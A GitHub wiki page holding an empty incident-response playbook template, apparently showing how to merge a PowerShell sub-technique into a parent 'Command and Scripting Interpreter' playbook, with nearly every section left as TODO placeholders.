Skip to content

What do if you think combining techniques into one playbook

Jump to bottom
Austin Songer edited this page Jul 12, 2021 · 2 revisions

EXAMPLE: Subtechniques that you think should be added to the parent technique

## Playbook: Command and Scripting Interpreter

**Mitigation-Category:** 
  
  
### MITRE

| Tactic | Technique ID | Technique Name | Sub-Technique Name | Platforms | Permissions Required |
| ------ | ------------ | -------------- | ------------------ |---------- |--------------------- |
|        |              |                |                    |           |                      |



(P) Preparation
  
 
  
Assign steps to individuals or teams to work concurrently, when possible; this playbook is not purely sequential. Use your best judgment.

--------------

### Investigate

`TODO: Expand investigation steps, including key questions and strategies, for <Type of Incident>.`


> Subtechniques Playbook:`.01 - PowerShell`
> 
> `TODO: Expand investigation steps, including key questions and strategies, for <Type of Incident>.`
> 
> 


--------------

### Remediate

* **Plan remediation events** where these steps are launched together (or in coordinated fashion), with appropriate teams ready to respond to any disruption.
* **Consider the timing and tradeoffs** of remediation actions: your response has consequences.



#### Contain

`TODO: Customize containment steps, tactical and strategic, for <Type of Incident>.`
`TODO: Specify tools and procedures for each step, below.`
`TODO: Consider automating containment measures using orchestration tools.`

> Subtechniques Playbook:`.01 - PowerShell`
> 
> `TODO: Customize containment steps, tactical and strategic, for <Type of Incident>.`
> `TODO: Specify tools and procedures for each step, below.`
> `TODO: Consider automating containment measures using orchestration tools.`
> 
> 

#### Eradicate

`TODO: Customize eradication steps, tactical and strategic, for <Type of Incident>.`

`TODO: Specify tools and procedures for each step, below.`

> Subtechniques Playbook:`.01 - PowerShell`
> 
> `TODO: Customize eradication steps, tactical and strategic, for <Type of Incident>.`
> `TODO: Specify tools and procedures for each step, below.`
> 
> 
> 

#### Reference: Remediation Resources

`TODO: Specify financial, personnel, and logistical resources to accomplish remediation.`

--------------

### Communicate

`TODO: Customize communication steps for <Type of Incident>`

`TODO: Specify tools and procedures (including who must be involved) for each step, below, or refer to overall plan.`

In addition to the general steps and guidance in the incident response plan:


   

--------------

### Recover

`TODO: Customize recovery steps for <Type of Incident>.`

`TODO: Specify tools and procedures for each step, below.`

In addition to the general steps and guidance in the incident response plan:


--------------
  
### Lessons Learned

`TODO: Add items that will occur post recover.`
  
1.    Perform routine cyber hygiene due diligence
2.    Engage external cybersecurity-as-a-service providers and response professionals
 

--------------

### Resources

#### Additional Information

1. <a name="identity-and-access-playbook-ref-1"></a>["Title"](#TODO-url), Author Last Name (Date)
Clone this wiki locally